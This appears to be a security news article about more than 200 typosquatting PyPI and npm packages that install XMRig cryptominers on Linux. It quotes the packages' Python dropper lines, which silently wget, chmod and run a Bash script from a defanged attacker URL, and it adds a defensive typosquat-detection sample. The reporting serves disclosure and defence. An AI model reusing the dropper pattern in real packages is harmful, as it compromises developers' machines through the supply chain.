More than 200 malicious packages have been discovered infiltrating the PyPI and npm open source registries this week.
These packages are largely typosquats of widely used libraries, and each one downloads a Bash script that runs cryptominers on Linux systems.
PyPI, npm flooded with cryptomining packages
Researchers have caught at least 241 malicious npm and PyPI packages that drop cryptominers after infecting Linux machines.
These packages are typosquats of popular open source libraries and commands like React, argparse, and AIOHTTP, but instead download and install cryptomining Bash scripts from the threat actor’s server.
On Wednesday, software developer and researcher Hauke Lübbers shared that he had come across “at least 33 projects” on PyPI that all launched XMRig, an open source Monero cryptominer, after infecting a system.
55 typosquats laced with cryptominers flood PyPI (Hauke Lübbers)
While the researcher was in the process of reporting these 33 malicious projects to PyPI admins, he noticed the threat actor began publishing another set of 22 packages with the same malicious payload.
“After I reported them to PyPI, they were quickly deleted – but the malicious actor was still in the process of uploading more packages, and uploaded another 22,” Lübbers tells BleepingComputer.
“The packages targeted Linux systems and installed crypto mining software XMRig,” explains the software engineer.
The Python packages contain the following piece of code, which downloads the Bash script from the threat actor’s server via the Bit.ly URL shortener (URLs are defanged):
import os

# Fetch the dropper through the URL shortener into a hidden file, silencing all output
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
# Make the downloaded script executable and run it
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
The researcher explains that the Bit[.]ly URL redirects to the script hosted on 80.78.25[.]140:8000.
“This was done by downloading and executing the Bash script from http://80.78.25[.]140:8000/.cmc”
Upon execution, the script notifies the threat actor of the IP address of the compromised host and whether the deployment of cryptominers succeeded.
At the time of writing, the IP address was down, but BleepingComputer was able to obtain a copy of the script and confirm the researcher’s claims:
Excerpt from Bash script installing cryptominers (BleepingComputer)
“I found these packages through a little side project of mine, which I call the Package Observatory Club,” Lübbers told BleepingComputer.
“It queries and stores metadata about all new packages uploaded to PyPI and RubyGems.org and runs some heuristics. If it looks suspicious enough it alerts me and I take a look.”
By heuristics, the developer primarily means checks for package names that look similar to those of standard-library modules and popular packages, which indicates a potential typosquat.
“More often than not, I get false positives, but especially last week it saw a lot of typosquatting on PyPI.”
“I am doing this, because the infosec community profits so much from the open source software ecosystem and I think we should give something back. Whether that is by finding and reporting vulnerabilities, by helping to protect it from malicious actors, or by contributing directly. We need to keep in mind that a lot of work on the package repositories’ side is done by just a handful of volunteers.”
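As an added illustration of the kind of name-similarity heuristic described above (this is not the Package Observatory Club’s code, and the popular-name list is a constructed sample), a minimal typosquat check in Python:

```python
import re

# Constructed sample of popular package names to compare against; a real
# deployment would load the registry's top-N download list instead.
POPULAR = ["requests", "argparse", "aiohttp", "react", "numpy", "urllib3", "setuptools"]


def normalize(name: str) -> str:
    """PEP 503 normalisation: lower-case and collapse runs of '-', '_' and '.' to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(new_name: str, popular=POPULAR, max_distance: int = 2):
    """Return (popular_name, distance) pairs that the new name is suspiciously close to.

    Exact matches are skipped: a popular package is not a typosquat of itself.
    Besides small edit distances, names that merely pad a popular name with a
    short prefix or suffix (e.g. "py-argparse", "argparse2") are flagged too.
    """
    n = normalize(new_name)
    hits = []
    for p in popular:
        pn = normalize(p)
        if n == pn:
            continue
        d = levenshtein(n, pn)
        padded = len(n) > len(pn) and pn in n and len(n) - len(pn) <= 3
        if d <= max_distance or padded:
            hits.append((p, d))
    return sorted(hits, key=lambda h: h[1])


if __name__ == "__main__":
    for candidate in ["arparse", "aiohtpp", "reakt", "py-argparse", "Requests", "flask"]:
        print(candidate, "->", typosquat_candidates(candidate))
```

Short popular names such as react will match many unrelated five-letter names at distance 2, which is the false-positive rate the researcher mentions; an alert from this check is a prompt for manual review, not a verdict.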
The Sonatype security research team, which I am a part of, disclosed another 186 npm typosquatting packages today that contact the same URL to download the malicious Bash script.
npm packages pull malicious code from the same URL (Sonatype)
It appears that both registries cleared the typosquats fairly quickly from their platforms before these could do more harm to developers.
Despite various security enhancements, like mandating two-factor authentication for critical projects and introducing new features (like Python’s setuptools moving towards replacing setup.py), it seems the open source repositories’ race against threat actors is only getting more challenging.
Last week, software security company Checkmarx reported discovering a dozen malicious Python packages performing DDoS attacks on Counter-Strike servers.
Earlier this month, cybersecurity firm CheckPoint outed 10 malicious PyPI packages caught stealing developer credentials.
In July, ReversingLabs researchers disclosed a supply chain attack dubbed IconBurst that once again exploited typosquatting to infect developers.
Update: Aug 20, 2022 10:34 AM: Added additional quotes sent by the developer after press time.